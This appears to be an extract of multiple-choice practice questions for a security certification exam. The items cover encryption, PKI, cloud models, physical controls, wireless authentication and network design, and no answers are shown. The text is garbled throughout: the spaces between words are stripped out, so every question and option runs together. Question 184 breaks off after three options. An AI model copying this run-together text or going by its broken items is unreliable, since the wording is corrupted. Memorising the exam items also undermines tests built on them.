147. Michelleistravelingandwantstoplugherphoneintothechargerinherhotelroom.Whatsecurityprecautioncansheusetoensurethatherphoneisnotattackedbyamaliciousdevicebuiltintothechargerinherroom?

A. AUSBdatablocker

B. AparallelUSBcable

C. Adatacircuitbreaker


D. AnHOTPinterrogator

148. Whichcloudservicemodelprovidestheconsumerwiththeinfrastructuretocreateapplicationsandhostthem?

A. SaaS

B. PaaS

C. IaaS

D. IDaaS

149. Whyisavoidinginitializationvectorandkeyreuserecommendedtoensuresecureencryption?

A. Itmakesitimpossibletobruteforce.

B. Itmeansasinglesuccessfulattackwillnotexposemultiplemessages.

C. Itmeansasinglesuccessfulattackwillnotexposeanymessages.

D. Itmakesbruteforceeasier.

150. DanknowsthathisLinuxsystemgeneratesentropythatisusedformultiplefunctions,includingencryption.WhichofthefollowingisasourceofentropyfortheLinuxkernel?

A. Timeofday

B. Userloginevents

C. Keystrokesandmousemovement

D. Networkpackettiming

151. Mikeknowsthatcomputationaloverheadsareaconcernforcryptographicsystems.Whatcanhedotohelplimitthecomputationalneedsofhissolution?

A. Usehashesinstead.

B. Useshortkeys.

C. Useellipticcurveencryption.

D. UsetheRSAalgorithm.

152. Whatistheprimaryroleoflightinginaphysicalsecurityenvironment?

A. Itactsasadetectivecontrol.


B. Itactsasareactivecontrol.

C. Itactsasadeterrentcontrol.

D. Itactsasacompensatingcontrol.

153. Dennishasdeployedserversandstoragetoeachofthefacilitieshisorganizationrunstoensurethatscientificequipmentcansendandreceivedataatthespeedthatitneedstofunction.Whatcomputationaldesignconceptdescribesthis?

A. Hybridcloud

B. Mistcomputing

C. Edgecomputing

D. Localcloud

154. Benreplacessensitivedatainhisdatabasewithuniqueidentifiers.Theidentifiersallowhimtocontinuetotakeactionsonthedatawithoutexposingthedataitself.Whattypeofsolutionhashedeployed?

A. Masking

B. Encryption

C. Hashing

D. Tokenization

155. Danawantstodiscouragepotentialmaliciousactorsfromaccessingherfacility.Whichofthefollowingisbothadeterrentandaphysicalcontrol?

A. Avisitorlog

B. Amotiondetector

C. Asecuritycamera

D. Fences

156. Whatadditionalcapabilitiesdoesaddingadigitalsignaturetoanencryptedmessageprovide?

A. Integrityandnonrepudiation

B. Confidentialityandintegrity

C. Availabilityandnonrepudiation


D. Confidentialityandavailability

157. Meganhasbeenaskedtosetupaperiodicattestationprocessforaccountsinherorganization.Whathasshebeenaskedtodo?

A. Validatethattheusersarestillemployed.

B. Validatethattheuser'srightsandpermissionsarestillcorrect.

C. Requireuserstoprovideproofofidentity.

D. Validatesecuritycontrolsaspartofatest.

158. Elainewantstoadoptappropriateresponseandrecoverycontrolsfornaturaldisasters.Whattypeofcontrolshouldsheusetoprepareforamultihourpoweroutagecausedbyatornado?

A. Ahotsite

B. Agenerator

C. APDU

D. AUPS

159. Whatdoesamessageauthenticationcode(MAC)dowhenusedaspartofacryptographicsystem?

A. Itvalidatesthemessage'sintegrityandauthenticity.

B. Itvalidatesthemessage'sconfidentialityandauthenticity.

C. Itprotectsthemessage'sconfidentialityandintegrity.

D. Noneoftheabove

160. Charleswantstoputafiresuppressionsysteminplaceinanareawherehighlysensitiveelectronicsareinuse.WhattypeoffiresuppressionsystemisbestsuitedtothistypeofenvironmentifCharlesisconcernedaboutpotentialharmtofirstrespondersoron-sitestaff?

A. Pre-charge

B. Drypipe

C. Inertgas

D. Carbondioxide

161. Whattechnologyistypicallyusedforproximitycardreaders?


A. Magneticstripe

B. Biometrics

C. RFID

D. Infrared

162. Howdoesasymmetricencryptionsupportnonrepudiation?

A. Usingdigitalsignatures

B. Usinglongerkeys

C. Usingreversiblehashes

D. Usingtherecipient'spublickey

163. Oliviaknowsthatsheneedstoconsidergeographyaspartofhersecurityconsiderations.Whichofthefollowingisaprimarydriverofgeographicalconsiderationsforsecurity?

A. MTR

B. Naturaldisasters

C. Serviceintegration

D. Sprawlavoidance

164. ScottwantstolimittheimpactofpotentialthreatsfromUAVs.Whatphysicalsecuritycontrolisbestsuitedtothispurpose?

A. Addingmorefences

B. Movingsensitiveareastotheinteriorofabuilding

C. Deployingbiometricsensors

D. MovingsensitiveareastoFaradaycages

165. Derekwantstoexplaintheconceptofresourceconstraintsdrivingsecurityconstraintswhenusingencryption.Whichofthefollowingdescriptionsbestexplainsthetrade-offsthatheshouldexplaintohismanagement?

A. Strongerencryptionrequiresmorespaceondrives,meaningthattheharderitistobreak,themorestorageyou'llneed,drivingupcost.

B. Strongerencryptionisfaster,whichmeansthatusingstrongencryptionwillresultinlowerlatency.


C. Strongerencryptionrequiresmoreentropy.Thismayreducetheoverallsecurityofthesystemwhenentropyisexhausted.

D. Strongerencryptionrequiresmorecomputationalresources,requiringabalancebetweenspeedandsecurity.

166. Amandawantstoensurethatthemessagesheissendingremainsconfidential.Whatshouldshedotoensurethis?

A. Hashthemessages.

B. Digitallysignthemessage.

C. Encryptthemessage.

D. Useaquantumencryptionalgorithm.

167. WhatsecurityadvantagedocloudserviceproviderslikeAmazon,Google,andMicrosofthaveoverlocalstaffandsystemsformostsmalltomid-sizedorganizations?

A. Betterunderstandingoftheorganization'sbusinesspractices

B. Fasterresponsetimes

C. Moresecuritystaffandbudget

D. Noneoftheabove

168. Timwantstoensurethathiswebserverscanscalehorizontallyduringtrafficincreases,whilealsoallowingthemtobepatchedorupgradedwithoutcausingoutages.Whattypeofnetworkdeviceshouldhedeploy?

A. Afirewall

B. Aswitch

C. Ahorizontalscaler

D. Anetworkloadbalancer

169. Gabbywantstoensurethatsensitivedatacanbetransmittedinunencryptedformbyusingphysicalsafeguards.Whattypeofsolutionshouldsheimplement?

A. Shieldedcables

B. Armoredcables

C. Distributionlockdown


D. Protectedcabledistribution

170. MaureenconcealsinformationshewantstotransmitsurreptitiouslybymodifyinganMP3fileinawaythatdoesnotnoticeablychangehowitsounds.Whatisthistechniquecalled?

A. MP3crypt

B. Audiosteganography

C. Audiohashing

D. HoneyMP3s

171. Nicoleisassessingriskstohermultifactorauthenticationsystem.Whichofthefollowingisthemostlikelythreatmodelagainstshortmessageservice(SMS)pushnotificationstocellphonesforherenvironment?

A. AttacksonVoIPsystems

B. SIMcloning

C. Brute-forceattacks

D. Rainbowtables

172. Johnwantstoprotectdataatrestsothathecanprocessitanduseitasneededinitsoriginalform.Whatsolutionfromthefollowinglistisbestsuitedtothisrequirement?

A. Hashing

B. TLS

C. Encryption

D. Tokenization

173. Nathanielhasdeployedthecontrolinfrastructureforhismanufacturingplantwithoutanetworkconnectiontohisothernetworks.Whattermdescribesthistypeofconfiguration?

A. DMZ

B. Airgap

C. Vaulting

D. Ahotaisle

174. NaomihidestheoriginaldatainaSocialSecuritynumberfieldtoensure


thatitisnotexposedtousersofherdatabase.Whatdatasecuritytechniquedoesthisdescribe?

A. Masking

B. Encryption

C. Hashing

D. Tokenization

175. Isaacwantstouseon-premisescloudcomputing.Whattermdescribesthistypeofcloudcomputingsolution?

A. Infrastructureasaservice

B. Hybridcloud

C. Privatecloud

D. Platformasaservice

176. Whatistheprimarythreatmodelagainstphysicaltokensusedformultifactorauthentication?

A. Cloning

B. Bruteforce

C. Theft

D. Algorithmfailure

177. Mariaisasecurityadministratorforalargebank.Sheisconcernedaboutmalware,particularlyspywarethatcouldcompromisecustomerdata.Whichofthefollowingwouldbethebestapproachforhertomitigatethethreatofspyware?

A. Computerusagepolicies,networkantimalware,andhostantimalware

B. Hostantimalwareandnetworkantimalware

C. Hostandnetworkantimalware,computerusagepolicies,andwebsitewhitelisting

D. Hostandnetworkantimalware,computerusagepolicies,andemployeetraining

178. CharleshasconfiguredhismultifactorsystemtorequirebothaPINandapassword.Howmanyeffectivefactorsdoeshehaveinplaceoncehe


presentsbothoftheseandhisusername?

A. One

B. Two

C. Three

D. Four

179. Fredaddsthevalue89EA443CCDA16B89toeverypasswordasasalt.Whatissuemightthiscause?

A. Thesaltistoolong.

B. Thesaltisalphanumeric.

C. Thesaltisreused.

D. Thesaltistooshort.

180. Alainaneedstophysicallysecuretherootencryptionkeysforacertificateauthority.Whattypeofsecuritydeviceshouldsheusetomaintainlocalcontrolandsecurityforthem?

A. AUSBthumbdrive

B. Avaultorsafe

C. Anair-gappedsystem

D. Noneoftheabove

181. AngelawantstohelpherorganizationuseAPIsmoresecurelyandneedstoselectthreeAPIsecuritybestpractices.WhichofthefollowingoptionsisnotacommonAPIsecuritybestpractice?

A. UseencryptionthroughouttheAPI'srequest/responsecycle.

B. Authorizebeforeauthenticating.

C. Donottrustinputstringsandvalidateparameters.

D. Enableauditingandlogging.

182. Frankusesapowerfulmagnettowipetapesbeforetheyareremovedfromhisorganization'sinventory.Whattypeofsecuredatadestructiontechniquehasheused?

A. Tapeburning


B. Datashredding

C. Degaussing

D. Pulping

183. Angelahasbeenaskedtodeploy5Gcellularinsideherorganization.Whatconcernshouldsheraisewithhermanagementabouttheefforttoimplementit?

A. 5Grequireshighlevelsofantennadensityforfullcoverage.

B. 5Gsignalsshouldonlybeusedinexteriordeployments.

C. 5Gisnotwidelyavailableandcannotbedeployedyet.

D. 5GsignalscannotcoexistwithtraditionalWi-Fi.

184. Chrisisreviewingtherightsthatstaffinhisorganizationhavetodatastoredinagroupofdepartmentalfileshares.Heisconcernedthatrightsmanagementpracticeshavenotbeenfollowedandthatemployeeswhohavebeenwiththecompanyheworksforhavenothadtheirprivilegesremovedaftertheyswitchedjobs.WhattypeofissuehasChrisencountered?

A. Privilegecreep

B. IAMinflation

C. Maskingissues


185. Isaachasbeenaskedtosetupahoneyfile.Whatshouldheconfigure?

A. Alistoftaskstoaccomplish

B. Alistofpotentiallyvaluabledata

C. Abaitfileforattackerstoaccess

D. AvulnerableWordfile

186. Yasminewantstoensurethatshehasmetageographicdispersalrequirementforherdatacenters.Howfarawayshouldsheplaceherdatacenterbasedoncommonbestpracticesfordispersal?

A. 5miles

B. 45miles


C. 90miles

D. 150miles

187. Whattermdescribesextendingcloudcomputingtotheedgeofanenterprisenetwork?

A. Localcloud

B. Fogcomputing

C. Managedcloud

D. Bladecomputing

188. Whichofthefollowingalgorithmsisakeystretchingalgorithm?

A. bcrypt

B. ncrypt

C. MD5

D. SHA1

189. Jocelynhasbeenaskedtoimplementadirectoryservice.Whichofthefollowingtechnologiesshouldshedeploy?

A. SAML

B. OAuth

C. LDAP

D. 802.1x


Chapter3Implementation


3.1 Givenascenario,implementsecureprotocols

3.2 Givenascenario,implementhostorapplicationsecuritysolutions

3.3 Givenascenario,implementsecurenetworkdesigns

3.4 Givenascenario,installandconfigurewirelesssecuritysettings

3.5 Givenascenario,implementsecuremobilesolutions

3.6 Givenascenarioapplycybersecuritysolutionstothecloud

3.7 Givenascenario,implementidentityandaccountmanagementcontrols

3.8 Givenascenario,implementauthenticationandauthorizationsolutions

3.9 Givenascenario,implementpublickeyinfrastructure

1. Adamissettingupapublickeyinfrastructure(PKI)andknowsthatkeepingthepassphrasesandencryptionkeysusedtogeneratenewkeysisacriticalpartofhowtoensurethattherootcertificateauthorityremainssecure.Whichofthefollowingtechniquesisnotacommonsolutiontohelppreventinsiderthreats?

A. Requireanewpassphraseeverytimethecertificateisused.

B. Useasplitknowledgeprocessforthepasswordorkey.

C. Requiredualcontrol.

D. Implementseparationofduties.

2. Naomiisdesigningherorganization'swirelessnetworkandwantstoensure


thatthedesignplacesaccesspointsinareaswheretheywillprovideoptimumcoverage.ShealsowantstoplanforanysourcesofRFinterferenceaspartofherdesign.WhatshouldNaomidofirst?

A. ContacttheFCCforawirelessmap.

B. Conductasitesurvey.

C. Disableallexistingaccesspoints.

D. Conductaportscantofindallexistingaccesspoints.

3. Chrisispreparingtoimplementan802.1X-enabledwirelessinfrastructure.HeknowsthathewantstouseanExtensibleAuthenticationProtocol(EAP)-basedprotocolthatdoesnotrequireclient-sidecertificates.Whichofthefollowingoptionsshouldhechoose?

A. EAP-MD5

B. PEAP

C. LEAP

D. EAP-TLS

4. Whattermiscommonlyusedtodescribelateraltrafficmovementwithinanetwork?

A. Side-stepping

B. Slidertraffic

C. East-westtraffic

D. Peerinterconnect

5. CharlenewantstousethesecurityfeaturesbuiltintoHTTPheaders.WhichofthefollowingisnotanHTTPheadersecurityoption?

A. Requiringtransportsecurity

B. Preventingcross-sitescripting

C. DisablingSQLinjection

D. HelpingpreventMIMEsniffing

6. Charlenewantstoprovisionherorganization'sstandardsetofmarketinginformationtomobiledevicesthroughoutherorganization.WhatMDMfeatureisbestsuitedtothistask?


A. Applicationmanagement

B. Remotewipe

C. Contentmanagement

D. Pushnotifications

7. Dennywantstodeployantivirusforhisorganizationandwantstoensurethatitwillstopthemostmalware.WhatdeploymentmodelshouldDennyselect?

A. InstallantivirusfromthesamevendoronindividualPCsandserverstobestbalancevisibility,support,andsecurity.

B. InstallantivirusfrommorethanonevendoronallPCsandserverstomaximizecoverage.

C. InstallantivirusfromonevendoronPCsandfromanothervendorontheservertoprovideagreaterchanceofcatchingmalware.

D. Installantivirusonlyonworkstationstoavoidpotentialissueswithserverperformance.

8. WhenAmandavisitsherlocalcoffeeshop,shecanconnecttotheopenwirelesswithoutprovidingapasswordorloggingin,butsheisimmediatelyredirectedtoawebsitethatasksforheremailaddress.Oncesheprovidesit,sheisabletobrowsetheInternetnormally.WhattypeoftechnologyhasAmandaencountered?

A. Apresharedkey

B. Acaptiveportal

C. Portsecurity

D. AWi-Fiprotectedaccess

9. CharleshasbeenaskedtoimplementDNSSECforhisorganization.Whichofthefollowingdoesitprovide?

A. Confidentiality

B. Integrity

C. Availability

D. Alloftheabove


10. SarahhasimplementedanOpenID-basedauthenticationsystemthatreliesonexistingGoogleaccounts.WhatroledoesGoogleplayinafederatedenvironmentlikethis?

A. AnRP

B. AnIdP

C. AnSP

D. AnRA

11. Ianneedstoconnecttoasystemviaanencryptedchannelsothathecanuseacommand-lineshell.Whatprotocolshouldheuse?

A. Telnet

B. HTTPS

C. SSH

D. TLS

12. Caseyisconsideringimplementingpasswordkeydevicesforherorganization.Shewantstouseabroadlyadoptedopenstandardforauthenticationandneedsherkeystosupportthat.Whichofthefollowingstandardsshouldshelookforherkeystoimplement,inadditiontobeingabletoconnectviaUSB,Bluetooth,andNFC?

A. SAML

B. FIDO

C. ARF

D. OpenID

13. NadiaisconcernedaboutthecontentofheremailstoherfriendDaniellebeingreadastheymovebetweenservers.Whattechnologycansheusetoencryptheremails,andwhosekeyshouldsheusetoencryptthemessage?

A. S/MIME,herprivatekey

B. SecurePOP3,herpublickey

C. S/MIME,Danielle'spublickey

D. SecurePOP3,Danielle'sprivatekey

14. WhattypeofcommunicationsisSRTPmostlikelytobeusedfor?


A. Email

B. VoIP

C. Web

D. Filetransfer

15. Oliviaisimplementingaload-balancedwebapplicationcluster.Herorganizationalreadyhasaredundantpairofloadbalancers,buteachunitisnotratedtohandlethemaximumdesignedthroughputoftheclusterbyitself.Oliviahasrecommendedthattheloadbalancersbeimplementedinanactive/activedesign.Whatconcernshouldsheraiseaspartofthisrecommendation?

A. Theloadbalancerclustercannotbepatchedwithoutaserviceoutage.

B. Theloadbalancerclusterisvulnerabletoadenial-of-serviceattack.

C. Ifoneoftheloadbalancersfails,itcouldleadtoservicedegradation.

D. Noneoftheabove

16. WhattwoportsaremostcommonlyusedforFTPStraffic?

A. 21,990

B. 21,22

C. 433,1433

D. 20,21

17. Whatoccurswhenacertificateisstapled?

A. BoththecertificateandOCSPresponderaresenttogethertopreventadditionalretrievalsduringcertificatepathvalidation.

B. Thecertificateisstoredinasecuredlocationthatpreventsthecertificatefrombeingeasilyremovedormodified.

C. Boththehostcertificateandtherootcertificateauthority'sprivatekeyareattachedtovalidatetheauthenticityofthechain.

D. Thecertificateisattachedtoothercertificatestodemonstratetheentirecertificatechain.

18. Gregissettingupapublickeyinfrastructure(PKI).Hecreatesanofflinerootcertificateauthority(CA)andthenneedstoissuecertificatestousers


anddevices.WhatsystemordeviceinaPKIreceivescertificatesigningrequests(CSRs)fromapplications,systems,andusers?

A. AnintermediaCA

B. AnRA

C. ACRL

D. Noneoftheabove

19. Markisresponsibleformanaginghiscompany'sloadbalancerandwantstouseaload-balancingschedulingtechniquethatwilltakeintoaccountthecurrentserverloadandactivesessions.Whichofthefollowingtechniquesshouldhechoose?

A. SourceIPhashing

B. Weightedresponsetime

C. Leastconnection

D. Roundrobin

20. Duringasecurityreview,MattnoticesthatthevendorheisworkingwithliststheirIPSecvirtualprivatenetwork(VPN)asusingAHprotocolforsecurityofthepacketsthatitsends.WhatconcernshouldMattnotetohisteamaboutthis?

A. AHdoesnotprovideconfidentiality.

B. AHdoesnotprovidedataintegrity.

C. AHdoesnotprovidereplayprotection.

D. Noneoftheabove;AHprovidesconfidentiality,authentication,andreplayprotection.

21. MichellewantstosecuremailbeingretrievedviathePostOfficeProtocolVersion3(POP3)becausesheknowsthatitisunencryptedbydefault.WhatisherbestoptiontodothiswhileleavingPOP3runningonitsdefaultport?

A. UseTLSviaport25.

B. UseIKEviaport25.

C. UseTLSviaport110.


D. UseIKEviaport110.

22. Danielworksforamid-sizedfinancialinstitution.Thecompanyhasrecentlymovedsomeofitsdatatoacloudsolution.Danielisconcernedthatthecloudprovidermaynotsupportthesamesecuritypoliciesasthecompany'sinternalnetwork.Whatisthebestwaytomitigatethisconcern?

A. Implementacloudaccesssecuritybroker.

B. Performintegrationtesting.

C. Establishcloudsecuritypolicies.

D. Implementsecurityasaservice.

23. ThecompanythatAngelaworksforhasdeployedaVoiceoverIP(VoIP)environmentthatusesSIP.Whatthreatisthemostlikelyissuefortheirphonecalls?

A. Callinterception

B. Vishing

C. Wardialing

D. Denial-of-serviceattacks

24. AlainaisconcernedaboutthesecurityofherNTPtimesynchronizationservicebecausesheknowsthatprotocolslikeTLSandBGParesusceptibletoproblemsiffakeNTPmessageswereabletocausetimemismatchesbetweensystems.WhattoolcouldsheusetoquicklyprotectherNTPtrafficbetweenLinuxsystems?

A. AnIPSecVPN

B. SSHtunneling

C. RDP

D. ATLSVPN

25. RamonisbuildinganewwebserviceandisconsideringwhichpartsoftheserviceshoulduseTransportLayerSecurity(TLS).Componentsoftheapplicationinclude:

1. Authentication

2. Apaymentform


3. Userdata,includingaddressandshoppingcart

4. Ausercommentsandreviewssection

WhereshouldheimplementTLS?

A. Atpoints1and2,and4

B. Atpoints2and3,and4

C. Atpoints1,2,and3

D. Atallpointsintheinfrastructure

26. Katie'sorganizationusesFileTransferProtocol(FTP)forcontractorstosubmittheirworkproducttoherorganization.Thecontractorsworkonsensitivecustomerinformation,andthenuseorganizationalcredentialsprovidedbyKatie'scompanytologinandtransfertheinformation.Whatsensitiveinformationcouldattackersgatheriftheywereabletocapturethenetworktrafficinvolvedinthistransfer?

A. Nothing,becauseFTPisasecureprotocol

B. IPaddressesforbothclientandserver

C. Thecontentofthefilesthatwereuploaded

D. Usernames,passwords,andfilecontent

27. WhatsecuritybenefitsareprovidedbyenablingDHCPsnoopingorDHCPsniffingonswitchesinyournetwork?

A. PreventionofmaliciousormalformedDHCPtraffic

B. PreventionofrogueDHCPservers

C. CollectionofinformationaboutDHCPbindings

D. Alloftheabove

28. Aaronwantstouseacertificateforthefollowingproductionhosts:

www.example.com

blog.example.com

news.example.com

WhatisthemostefficientwayforhimtoprovideTransportLayerSecurity(TLS)forallofthesesystems?

A. Useself-signedcertificates.


B. Useawildcardcertificate.

C. UseanEVcertificate.

D. UseanSSLcertificate.

29. Cassandraisconcernedaboutattacksagainsthernetwork'sSpanningTreeProtocol(STP).ShewantstoensurethatanewswitchintroducedbyanattackercannotchangethetopologybyassertingalowerbridgeIDthanthecurrentconfiguration.Whatshouldsheimplementtopreventthis?

A. EnableBridgeProtect.

B. SetthebridgeIDtoanegativenumber.

C. DisableSpanningTreeprotocol.

D. EnableRootGuard.

30. CharlesfindsaPFXformattedfileonthesystemheisreviewing.WhatisaPFXfilecapableofcontaining?

A. Onlycertificatesandchaincertificates,notprivatekeys

B. Onlyaprivatekey

C. Aservercertificate,intermediatecertificates,andtheprivatekey

D. Noneoftheabove,becausePFXfilesareusedforcertificaterequestsonly

31. Whichdevicewouldmostlikelyprocessthefollowingrules?

PERMITIPANYEQ443

DENYIPANYANY

A. NIPS

B. HIPS

C. Contentfilter

D. Firewall

32. TedwantstouseIPreputationinformationtoprotecthisnetworkandknowsthatthirdpartiesprovidethatinformation.Howcanhegetthisdata,andwhatsecureprotocolishemostlikelytousetoretrieveit?

A. Asubscriptionservice,SAML


B. AVDI,XML

C. Asubscriptionservice,HTTPS

D. AnFDE,XML

33. WhatdoessettingthesecureattributeforanHTTPcookieresultin?

A. Cookieswillbestoredinencryptedform.

B. CookieswillbesentonlyoverHTTPS.

C. Cookieswillbestoredinhashedform.

D. Cookiesmustbeaccessedusingacookiekey.

34. CharleswantstouseIPSecandneedstobeabletodeterminetheIPSecpolicyfortrafficbasedontheportitisbeingsenttoontheremotesystem.WhichIPSecmodeshouldheuse?

A. IPSectunnelmode

B. IPSecIKEmode

C. IPSecPSKmode

D. IPSectransportmode

35. Wi-FiProtectedSetup(WPS)includesfourmodesforaddingdevicestoanetwork.Whichmodehassignificantsecurityconcernsduetoabrute-forceexploit?

A. PIN

B. USB

C. Pushbutton

D. Near-fieldcommunication

36. Clairewantstocheckwhetheracertificatehasbeenrevoked.Whatprotocolisusedtovalidatecertificates?

A. RTCP

B. CRBL

C. OCSP

D. PKCRL

37. Nickisresponsibleforcryptographickeysinhiscompany.Whatisthebest


waytodeauthorizeapublickey?

A. Sendoutanetworkalert.

B. Deletethedigitalcertificate.

C. PublishthatcertificateintheCRL.

D. NotifytheRA.

38. Whattwoconnectionmethodsareusedformostgeofencingapplications?

A. CellularandGPS

B. USBandBluetooth

C. GPSandWi-Fi

D. CellularandBluetooth

39. Gabrielissettingupanewe-commerceserver.Heisconcernedaboutsecurityissues.Whichofthefollowingwouldbethebestlocationtoplaceane-commerceserver?

A. DMZ

B. Intranet

C. Guestnetwork

D. Extranet

40. Janelleisthesecurityadministratorforasmallcompany.Sheistryingtoimprovesecuritythroughoutthenetwork.Whichofthefollowingstepsshouldshetakefirst?

A. Implementantimalwareonallcomputers.

B. Implementacceptableusepolicies.

C. Turnoffunneededservicesonallcomputers.

D. Setpasswordreusepolicies.

41. Benisresponsibleforanewapplicationwithaworldwideuserbasethatwillallowuserstosignuptoaccessexistingdataaboutthem.Hewouldliketouseamethodofauthenticationthatwillpermithimtoverifythatusersarethecorrectpeopletomatchupwiththeiraccounts.Howcanhevalidatetheseusers?

A. RequirethattheypresenttheirSocialSecuritynumber.


B. RequirethemtouseafederatedidentityviaGoogle.

C. Requirethemtouseknowledge-basedauthentication.

D. Requirethemtovalidateanemailsenttotheaccounttheysignedupwith.

42. Jasonwantstoimplementaremoteaccessvirtualprivatenetwork(VPN)forusersinhisorganizationwhoprimarilyrelyonhostedwebapplications.WhatcommonVPNtypeisbestsuitedtothisifhewantstoavoiddeployingclientsoftwaretohisend-usersystems?

A. ATLSVPN

B. AnRDP(RemoteDesktopProtocol)VPN

C. AnInternetControlMessageProtocol(ICMP)VPN

D. AnIPSecVPN

43. Juanisanetworkadministratorforaninsurancecompany.Hiscompanyhasanumberoftravelingsalespeople.Heisconcernedaboutconfidentialdataontheirlaptops.Whatisthebestwayforhimtoaddressthis?

A. FDE

B. TPM

C. SDN

D. DMZ

44. WhichdesignconceptlimitsaccesstosystemsfromoutsideuserswhileprotectingusersandsystemsinsidetheLAN?

A. DMZ

B. VLAN

C. Router

D. Guestnetwork

45. Ninawantstouseinformationaboutherusersliketheirbirthdates,addresses,andjobtitlesaspartofheridentitymanagementsystem.Whattermisusedtodescribethistypeofinformation?

A. Roles

B. Factors


C. Identifiers

D. Attributes

46. Meganispreparingacertificatesigningrequest(CSR)andknowsthatsheneedstoprovideaCNforherwebserver.WhatinformationwillsheputintotheCNfieldfortheCSR?

A. Hername

B. Thehostname

C. Thecompany'sname

D. Thefullyqualifieddomainnameofthesystem

47. WhichofthefollowingistheequivalentofaVLANfromaphysicalsecurityperspective?

A. Perimetersecurity

B. Partitioning

C. Securityzones

D. Firewall

48. Nelsonusesatoolthatliststhespecificapplicationsthatcanbeinstalledandrunonasystem.Thetooluseshashesoftheapplication'sbinarytoidentifyeachapplicationtoensurethattheapplicationmatchesthefilenameprovidedforit.WhattypeoftoolisNelsonusing?

A. Antivirus

B. Blacklisting

C. Antimalware

D. Whitelisting

49. Whichtypeoffirewallexaminesthecontentandcontextofeachpacketitencounters?

A. Packetfilteringfirewall

B. Statefulpacketfilteringfirewall

C. Applicationlayerfirewall

D. Gatewayfirewall


50. Aspartofhiswirelessnetworkdeploymentefforts,Scottgeneratestheimageshownhere.Whattermisusedtodescribethistypeofvisualizationofwirelessnetworks?

A. Aheatmap

B. Anetworkdiagram

C. Azonemap

D. ADMZ

51. You'redesigninganewnetworkinfrastructuresothatyourcompanycanallowunauthenticatedusersconnectingfromtheInternettoaccesscertainareas.Yourgoalistoprotecttheinternalnetworkwhileprovidingaccesstothoseareas.Youdecidetoputthewebserveronaseparatesubnetopentopubliccontact.Whatisthissubnetcalled?

A. Guestnetwork


B. DMZ

C. Intranet

D. VLAN

52. Madhuri'swebapplicationconvertsnumbersthatareinputintofieldsbyspecificallytypingthemandthenappliesstrictexceptionhandling.Italsosetsaminimumandmaximumlengthfortheinputsthatitallowsandusespredefinedarraysofallowedvaluesforinputslikemonthsordates.WhattermdescribestheactionsthatMadhuri'sapplicationisperforming?

A. Bufferoverflowprevention

B. Stringinjection

C. Inputvalidation

D. Schemavalidation

53. You'reoutliningyourplansforimplementingawirelessnetworktouppermanagement.Whatwirelesssecuritystandardshouldyouadoptifyoudon'twanttouseenterpriseauthenticationbutwanttoprovidesecureauthenticationforusersthatdoesn'trequireasharedpasswordorpassphrase?

A. WPA3

B. WPA

C. WPA2

D. WEP

54. Brandonwantstoensurethathisintrusionpreventionsystem(IPS)isabletostopattacktraffic.Whichdeploymentmethodismostappropriateforthisrequirement?

A. Inline,deployedasanIPS

B. Passiveviaatap,deployedasanIDS

C. Inline,deployedasanIDS

D. Passiveviaatap,deployedasanIPS

55. Youarethechiefsecurityofficer(CSO)foralargecompany.Youhavediscoveredmalwareononeoftheworkstations.Youareconcernedthatthemalwaremighthavemultiplefunctionsandmighthavecausedmore


securityissueswiththecomputerthanyoucancurrentlydetect.Whatisthebestwaytotestthismalware?

A. Leavethemalwareonthatworkstationuntilitistested.

B. Placethemalwareinasandboxenvironmentfortesting.

C. Itisnotimportanttoanalyzeortestit;justremoveitfromthemachine.

D. Placethemalwareonahoneypotfortesting.

56. Youaretryingtoincreasesecurityatyourcompany.You'recurrentlycreatinganoutlineofalltheaspectsofsecuritythatwillneedtobeexaminedandactedon.WhichofthefollowingtermsdescribestheprocessofimprovingsecurityinatrustedOS?

A. FDE

B. Hardening

C. SED

D. Baselining

57. Melissa'swebsiteprovidesuserswhoaccessitviaHTTPSwithaTransportLayerSecurity(TLS)connection.Unfortunately,Melissaforgottorenewhercertificate,anditispresentinguserswithanerror.WhathappenstotheHTTPSconnectionwhenacertificateexpires?

A. Alltrafficwillbeunencrypted.

B. TrafficforuserswhodonotclickOKatthecertificateerrorwillbeunencrypted.

C. Trustwillbereduced,buttrafficwillstillbeencrypted.

D. Userswillberedirectedtothecertificateauthority'ssiteforawarninguntilthecertificateisrenewed.

58. Isaacisreviewinghisorganization'ssecurecodingpracticesdocumentforcustomer-facingwebapplicationsandwantstoensurethattheirinputvalidationrecommendationsareappropriate.Whichofthefollowingisnotacommonbestpracticeforinputvalidation?

A. Ensurevalidationoccursonatrustedserver.

B. Validateallclient-supplieddatabeforeitisprocessed.


C. Validateexpecteddatatypesandranges.

D. Ensurevalidationoccursonatrustedclient.

59. Frankknowsthatthesystemsheisdeployinghaveabuilt-inTPMmodule.WhichofthefollowingcapabilitiesisnotafeatureprovidedbyaTPM?

A. Arandomnumbergenerator

B. Remoteattestationcapabilities

C. AcryptographicprocessorusedtospeedupSSL/TLS

D. Theabilitytobindandsealdata

60. Whatistheprimaryuseofhashingindatabases?

A. Toencryptstoreddata,thuspreventingexposure

B. Forindexingandretrieval

C. Toobfuscatedata

D. Tosubstituteforsensitivedata,allowingittobeusedwithoutexposure

61. Hansisasecurityadministratorforalargecompany.Usersonhisnetworkvisitawiderangeofwebsites.Heisconcernedtheymightgetmalwarefromoneofthesemanywebsites.Whichofthefollowingwouldbehisbestapproachtomitigatethisthreat?

A. Implementhost-basedantivirus.

B. Blacklistknowninfectedsites.

C. Setbrowserstoallowonlysignedcomponents.

D. Setbrowserstoblockallactivecontent(ActiveX,JavaScript,etc.).

62. Zarmeenahasimplementedwirelessauthenticationforhernetworkusingapassphrasethatshedistributestoeachmemberofherorganization.Whattypeofauthenticationmethodhassheimplemented?

A. Enterprise

B. PSK

C. Open

D. Captiveportal

63. OliviaisbuildingawirelessnetworkandwantstoimplementanExtensible


AuthenticationProtocol(EAP)-basedprotocolforauthentication.WhatEAPversionshouldsheuseifshewantstoprioritizereconnectionspeedanddoesn'twanttodeployclientcertificatesforauthentication?

A. EAP-FAST

B. EAP-TLS

C. PEAP

D. EAP-TTLS

64. Youworkatalargecompany.Youareconcernedaboutensuringthatallworkstationshaveacommonconfiguration,thatnoroguesoftwareisinstalled,andthatallpatchesarekeptuptodate.Whichofthefollowingwouldbethemosteffectiveforaccomplishingthis?

A. UseVDI.

B. Implementrestrictivepolicies.

C. Useanimageforallworkstations.

D. Implementstrongpatchmanagement.

65. Naomihasdeployedherorganization'scloud-basedvirtualdatacenterstomultipleGoogledatacenterlocationsaroundtheglobe.Whatdoesthisdesignprovideforhersystems?

A. Resistancetoinsiderattacks

B. Highavailabilityacrossmultiplezones

C. Decreasedcosts

D. Vendordiversity

